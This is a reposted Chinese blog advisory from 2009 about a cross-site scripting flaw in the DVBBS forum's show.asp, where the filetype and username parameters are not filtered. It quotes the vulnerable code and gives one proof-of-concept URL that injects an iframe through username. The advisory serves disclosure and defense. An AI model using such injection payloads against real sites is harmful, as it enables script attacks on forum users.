动网论坛(DVBBS)Show.asp页面过滤不严导致跨站漏洞

于 2009-06-21 00:35:00 发布
阅读量538 收藏
点赞数
分类专栏: 安全漏洞 文章标签: 互联网 网游 产品
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liusan_8310/article/details/4285967
版权

 

添加时间:2009-05-25

系统编号:WAVDB-01432

影响版本:DVBBS 8.0.0-8.2.0

程序介绍:
动 网论坛做为动网主要服务产品之一,自2001年投入推广并运营以来,得到了国内外广大互联网用户的广泛好评和支持。做为国内第一的互联网论坛服务品牌,占 据了国内论坛服务市场的70%以上的用户,动网论坛服务在一些如电影、下载、网游等热门网站的占有率甚至高达80%以上,是中国论坛服务领域事实上的标 准。

漏洞分析:
文件show.asp中:
filetype=Request("filetype") //第75行
username=Request("username")
……
TempStr = Replace(TempStr,"{$username}",UserName) //第244行

程序对于输出变量filetype和username过滤导致xss漏洞的产生。

漏洞利用:http://www.target.com/show.asp?filetype=xxx&username=nnn<iframe%20src=http://www.baidu.com></iframe>

解决方案:
厂商补丁
DVBBS
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.dvbbs.net

信息来源:
<*来源: Bug.Center.Team http://www.cnbct.org
链接: http://wavdb.com/vuln/1437
*>

liusan_8310
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ASP源码—动网论坛Dvbbs v8.3 美化版 v2.0.zip
10-21
动网论坛Dvbbs是一款基于ASP技术的开源社区论坛系统,它为用户提供了一个功能丰富的平台,允许用户进行交流、讨论和分享信息。在这个特定的版本——v8.3美化版v2.0中,开发者对原始的Dvbbs论坛界面进行了优化,以...
动网论坛版本Dvbbs7.1.rar
11-11
程序内核:2005年7月10日 DvBBS v7.1.0,美化修改说明: (1)安装了"蓝色心情"风格和"我为她狂"风格 (2)去除修改个人资料页面底部的空白 (3)去除发帖页面底部的空白 内置114张100*100的精美论坛头像 默认管理员:Admin ...
基于ASP动网论坛Dvbbs v8.3 美化版 v2.0.zip
07-13
总结起来,ASP作为一款服务器端脚本语言,曾经是构建动态网站的主流选择,而动网论坛Dvbbs v8.3 美化版 v2.0则是基于ASP论坛系统,通过优化界面设计,提升了用户互动体验。了解这些基础概念有助于理解并操作此类...
ASP源码—Dvbbs ASP动网论坛 8.3简洁修改版 v3.0.zip
10-14
ASP动网论坛Dvbbs 8.3简介】 ASP动网论坛Dvbbs)是一款基于Active Server Pages(ASP)技术开发的网络社区软件,主要用于构建互动性强、功能丰富的在线论坛。8.3版本是该论坛系统的一个重要迭代,提供了更加...
动网论坛DVBBS 8.3 Build 2013.8.5
04-30
动网论坛DVBBS做为目前国内的社区论坛软件服务提供商,依靠其强大的功能、非凡的访问速度和负载能力、友好方便的客户操作界面、优质的客户服务、国内领先的技术和强大而持续的产品研发并保持不断创新的能力,动网所...
chromedriver-mac-arm64_126.0.6474.0.zip
07-31
chromedriver-mac-arm64_126.0.6474.0.zip
chromedriver-mac-arm64_128.0.6548.0.zip
07-31
chromedriver-mac-arm64_128.0.6548.0.zip
MySQL查询加速器:利用Query Cache提升效率
07-31
MySQL是一个流行的开源关系型数据库管理系统(RDBMS),广泛用于Web应用程序的后端数据存储。它基于结构化查询语言(SQL)来管理数据,并且是LAMP(Linux, Apache, MySQL, PHP/Python/Perl)技术栈的一部分,这个技术栈常用于构建动态网站和Web应用程序。 MySQL的特点包括: - **开放源代码**:MySQL的源代码是公开的,任何人都可以自由使用和修改。 - **跨平台**:MySQL可以在多种操作系统上运行,包括Linux、Windows、macOS等。 - **高性能**:MySQL以其快速的查询处理和良好的性能而闻名。 - **可靠性**:MySQL提供了多种机制来确保数据的完整性和可靠性,包括事务支持、备份和恢复功能。 - **易于使用**:MySQL提供了简单直观的界面和丰富的文档,便于用户学习和使用。 - **可扩展性**:MySQL支持从小型应用到大型企业级应用的扩展。 - **社区支持**:由于其广泛的使用,MySQL拥有一个活跃的开发者社区,提供大量的资源和支持。 MySQL被广泛应用于各种场景,包括在线事务处理(OL
Objective-C语言的基础教程.md
最新发布
07-31
Objective-C是一种面向对象的编程语言,是C语言的扩展。它主要用于苹果的iOS和macOS应用程序开发。
暂存暂存暂存暂存暂存暂存暂存暂存
07-31
暂存暂存暂存暂存暂存暂存暂存暂存
Java实现HTTP断点续传的多线程安全解决方法.zip
07-31
Java实现HTTP断点续传的多线程安全解决方法
数据库课程设计报告-宿舍信息管理系统.doc
07-31
系统要处理的对象包括宿舍楼基本信息、学生基本信息、宿舍基本信息、楼栋管理员基本信息、物品出入基本信息等五个方面,各个对象包括信息如下所示(详细的数据见于数据字典): 1.学生基本信息(Student):包括 学生编号、学生所在学院信息、学生姓名、学生性别、学生来自省份、学生出生日期、学生入学时间、学生所学专业、所在班级等方面的信息,可以方便学生信息的查询和更新; 2.宿舍楼基本信息(Dormitory):包括 宿舍楼编号、每一幢宿舍楼楼管处的电话、宿舍楼楼管员信息、宿舍楼性别分类信息等方面,这样可以方便管理者对宿舍楼的管理,提高查询效率; 3.宿舍基本信息(Room): 包括 宿舍编号、舍长信息、舍员信息、楼栋号; 4.楼栋管理员基本信息(Worker):包括 工作人员编号、工作人员姓名、工作类型、工资、性别、联系方式、工作时间等数据项,可以方便管理人员对宿舍楼道工人的任用、信息查询及更改; 6.物品出入基本信息(ArticalInOut):包括出入物品的学生信息、出入的物品信息、出入物品时的负责人信息、出入物品时间,尽量减少宿舍事故的发生,保障学生宿舍财产的安全。
Java面试经验、面试技巧、常见面试知识点整理。.zip
07-31
Java面试经验、面试技巧、常见面试知识点整理。
智能汽车轨迹跟踪多目标显式模型预测控制_赵树恩.caj
07-31
智能汽车轨迹跟踪多目标显式模型预测控制_赵树恩
基于多对象离散拓扑优化方法的车身结构平台化设计_华钧伟.caj
07-31
基于多对象离散拓扑优化方法的车身结构平台化设计_华钧伟
节能秘笈:汇编语言中的功耗管理技术全解析
07-31
汇编语言(Assembly Language)是一种低级编程语言,它用于控制计算机的中央处理器(CPU)。汇编语言与机器码非常接近,几乎是一一对应的关系,但它使用助记符(mnemonics)来代表特定的机器指令,使得程序员更容易阅读和编写。 ## 汇编语言的特点: 1. **依赖于特定的硬件架构**:不同的CPU架构(如x86、ARM、MIPS等)有自己专用的汇编语言。 2. **低级语言**:汇编语言直接操作硬件,包括内存地址、寄存器和输入/输出端口。 3. **可读性**:虽然比机器码更易于理解,但仍然需要特定的知识和技能来编写和维护。 4. **效率**:由于直接控制硬件,汇编语言编写的程序通常非常高效,执行速度快。 5. **可移植性差**:汇编语言程序通常需要针对特定的硬件或操作系统进行编写,移植到其他平台需要重写或调整。 ## 汇编语言的基本元素: - **指令**:执行特定操作的代码,如数据传输、算术运算、逻辑运算等。 - **寄存器**:CPU内部的存储位置,用于快速访问数据。 - **内存地址**:存储数据的物理位置。 - **常量和变量**:用于存储数据的值
数据安全堡垒:使用MySQL加密功能全面保护数据
07-31
MySQL是一个流行的开源关系型数据库管理系统(RDBMS),广泛用于Web应用程序的后端数据存储。它基于结构化查询语言(SQL)来管理数据,并且是LAMP(Linux, Apache, MySQL, PHP/Python/Perl)技术栈的一部分,这个技术栈常用于构建动态网站和Web应用程序。 MySQL的特点包括: - **开放源代码**:MySQL的源代码是公开的,任何人都可以自由使用和修改。 - **跨平台**:MySQL可以在多种操作系统上运行,包括Linux、Windows、macOS等。 - **高性能**:MySQL以其快速的查询处理和良好的性能而闻名。 - **可靠性**:MySQL提供了多种机制来确保数据的完整性和可靠性,包括事务支持、备份和恢复功能。 - **易于使用**:MySQL提供了简单直观的界面和丰富的文档,便于用户学习和使用。 - **可扩展性**:MySQL支持从小型应用到大型企业级应用的扩展。 - **社区支持**:由于其广泛的使用,MySQL拥有一个活跃的开发者社区,提供大量的资源和支持。 MySQL被广泛应用于各种场景,包括在线事务处理(OL
chromedriver-mac-x64_122.0.6253.0.zip
07-31
chromedriver-mac-x64_122.0.6253.0.zip
chromedriver-mac-arm64_127.0.6490.0.zip
07-31
chromedriver-mac-arm64_127.0.6490.0.zip
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值